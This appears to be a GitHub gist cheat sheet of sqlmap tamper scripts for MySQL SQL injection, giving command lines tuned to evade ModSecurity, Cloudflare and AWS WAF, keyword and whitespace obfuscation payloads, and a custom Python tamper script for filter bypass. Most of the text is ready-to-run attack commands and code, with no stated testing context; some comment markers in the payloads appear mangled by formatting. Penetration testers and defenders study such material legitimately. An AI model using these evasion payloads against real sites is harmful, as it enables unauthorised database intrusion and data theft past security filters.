Skip to content

Instantly share code, notes, and snippets.

@random-robbie

random-robbie/sqlmap.md

Created February 10, 2026 21:18
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save random-robbie/61b65064e4012fa12a13e8a416bcea38 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save random-robbie/61b65064e4012fa12a13e8a416bcea38 to your computer and use it in GitHub Desktop.
Download ZIP
best tamper scripts for mysql for sqlmap
Raw
sqlmap.md

Essential MySQL Tamper Scripts

Most Effective General Purpose:

--tamper=between,randomcase,space2comment

  • between - Replaces > with NOT BETWEEN 0 AND # and = with BETWEEN # AND #
  • randomcase - Randomizes case of keywords (bypass case-sensitive filters)
  • space2comment - Replaces spaces with /**/ comments

For WAF/Filter Bypass:

Strong WAF bypass combo

--tamper=between,charencode,charunicodeencode,randomcase,space2comment

Alternative for strict filters

--tamper=space2hash,between,greatest,charencode

Specific MySQL Tamper Scripts: ┌───────────────────────┬──────────────────────────────────┬────────────────────────────────┐ │ Script │ Purpose │ Example │ ├───────────────────────┼──────────────────────────────────┼────────────────────────────────┤ │ space2comment │ Replace space with // │ SELECT//FROM │ ├───────────────────────┼──────────────────────────────────┼────────────────────────────────┤ │ space2hash │ Replace space with # + newline │ SELECT#%0AFROM │ ├───────────────────────┼──────────────────────────────────┼────────────────────────────────┤ │ space2plus │ Replace space with + │ SELECT+FROM │ ├───────────────────────┼──────────────────────────────────┼────────────────────────────────┤ │ between │ Replace comparators │ id>1 → id NOT BETWEEN 0 AND 1 │ ├───────────────────────┼──────────────────────────────────┼────────────────────────────────┤ │ greatest │ Replace > with GREATEST │ id>1 → GREATEST(id,1)=id │ ├───────────────────────┼──────────────────────────────────┼────────────────────────────────┤ │ ifnull2ifisnull │ Replace IFNULL with IF(ISNULL │ MySQL-specific syntax │ ├───────────────────────┼──────────────────────────────────┼────────────────────────────────┤ │ randomcase │ Randomize case │ SELECT → SeLeCt │ ├───────────────────────┼──────────────────────────────────┼────────────────────────────────┤ │ charencode │ URL encode characters │ ' → %27 │ ├───────────────────────┼──────────────────────────────────┼────────────────────────────────┤ │ charunicodeencode │ Unicode encode │ SELECT → %u0053%u0045%u004C... │ ├───────────────────────┼──────────────────────────────────┼────────────────────────────────┤ │ versionedkeywords │ Add MySQL version comments │ SELECT → /!50000SELECT/ │ ├───────────────────────┼──────────────────────────────────┼────────────────────────────────┤ │ versionedmorekeywords │ More aggressive version comments │ Bypasses strict parsers │ └───────────────────────┴──────────────────────────────────┴────────────────────────────────┘ Recommended Combinations by Scenario:

  1. ModSecurity/Generic WAF:

sqlmap -u "URL" --tamper=space2comment,between,randomcase,charencode --level=5 --risk=3

  1. Cloudflare WAF:

sqlmap -u "URL" --tamper=between,charencode,charunicodeencode,equaltolike,space2comment --random-agent

  1. AWS WAF:

sqlmap -u "URL" --tamper=space2hash,between,greatest,randomcase

  1. Custom PHP/Python Filters:

sqlmap -u "URL" --tamper=between,charencode,randomcase,space2comment,greatest

  1. Strict Input Validation:

sqlmap -u "URL" --tamper=versionedkeywords,versionedmorekeywords,between,space2comment

MySQL-Specific Advanced Techniques:

Version Comment Bypass:

/!50000SELECT/ /!50000FROM/ /!50000users/ Use: --tamper=versionedkeywords

Whitespace Alternatives:

SELECT//column//FROM/**/table SELECT%0Acolumn%0AFROM%0Atable SELECT%09column%09FROM%09table SELECT+column+FROM+table

Function Alternatives:

-- Instead of SUBSTRING MID(string, start, length) SUBSTR(string, start, length)

-- Instead of ASCII ORD(char)

-- Instead of IF CASE WHEN condition THEN true ELSE false END

Custom Tamper Script (Most Effective):

Create /Users/r/.sqlmap/tamper/mysql_custom.py: #!/usr/bin/env python

from lib.core.enums import PRIORITY

priority = PRIORITY.NORMAL

def dependencies(): pass

def tamper(payload, kwargs): """ Custom MySQL tamper combining best techniques """ if payload: # Replace spaces with comments payload = payload.replace(" ", "//")

      # Randomize case for SELECT, FROM, WHERE, AND, OR
      for keyword in ["SELECT", "FROM", "WHERE", "AND", "OR", "UNION", "NULL"]:
          payload = payload.replace(keyword, ''.join(
              c.upper() if i % 2 else c.lower()
              for i, c in enumerate(keyword)
          ))

      # Replace = with BETWEEN
      if "=" in payload and "!=" not in payload:
          parts = payload.split("=")
          if len(parts) == 2:
              payload = f"{parts[0]}/**/BETWEEN/**/{parts[1]}/**/AND/**/{parts[1]}"

      # Add version comments around keywords
      for keyword in ["SeLeCt", "fRoM", "wHeRe", "UnIoN"]:
          payload = payload.replace(keyword, f"/*!50000{keyword}*/")

  return payload

Usage: sqlmap -u "URL" --tamper=mysql_custom --batch

Pro Tips:

  1. Always use with level/risk: --level=5 --risk=3
  2. Chain multiple tampers: --tamper=script1,script2,script3
  3. Test tamper effectiveness: sqlmap -u "URL" --tamper=space2comment --test-filter="MySQL"
  4. For time-based blind: --tamper=between,space2comment --technique=T --time-sec=5
  5. Combine with other options: --random-agent --delay=2 --timeout=30 --retries=3
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment